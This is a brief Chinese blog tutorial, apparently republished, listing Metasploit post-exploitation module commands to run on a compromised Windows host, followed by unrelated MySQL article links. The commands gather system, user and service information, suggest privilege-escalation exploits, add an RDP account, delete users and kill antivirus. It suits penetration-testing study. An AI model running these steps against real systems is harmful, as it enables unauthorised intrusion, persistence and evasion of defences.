Metasploit -- 后渗透模块(POST)
本文共 649 字,大约阅读时间需要 2 分钟。
给时间一点时间,让过去过去,让开始开始。。。
---- 网易云热评
作用:获取目标主机后shell后,继续信息收集,提权
1、获取目标分区情况
run post/windows/gather/forensics/enum_drives
2、检测是否是虚拟主机
run post/windows/gather/checkvm
3、获取当前安装的应用程序
run post/windows/gather/enum_applications
4、获取用户登录信息
run post/windows/gather/enum_logged_on_users
5、对目标进行漏洞扫描
run post/multi/recon/local_exploit_suggester
6、收集系统环境信息
run post/multi/gather/env
7、查看开启的服务
run post/windows/gather/enum_services
8、查看目标主机最近的操作
run post/windows/gather/dumplinks
9、其他操作
删除用户
run post/wndows/manage/delete_user username=aiyou
添加账户
run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou
关闭杀软
windows/manage/killav
禁止非法,后果自负
欢迎关注公众号:web安全工具库
转载地址:http://ovnl.baihongyu.com/
你可能感兴趣的文章
MySQL数据读写分离(MaxScale)上干货!!!
查看>>
Mysql新建用户和数据库并授权
查看>>
MySQL日期时间函数大全
查看>>
MySQL更新锁(for update)摘要
查看>>
MySQL服务器安装(Linux)
查看>>
mysql服务器查询慢原因分析方法
查看>>
mysql服务无法启动的问题
查看>>
mysql权限
查看>>
mysql条件查询
查看>>
MySQL架构与SQL的执行流程_1
查看>>
MySQL查询优化之索引
查看>>
mysql查询储存过程,函数,触发过程
查看>>
mysql查询总成绩的前3名学生信息
查看>>
mysql的cast函数
查看>>
mysql的InnoDB引擎索引为什么使用B+Tree
查看>>
mysql的logrotate脚本
查看>>
MySQL的on duplicate key update 的使用
查看>>
MySQL的Replace用法详解
查看>>
mysql的root用户无法建库的问题
查看>>
mysql的sql执行计划详解
查看>>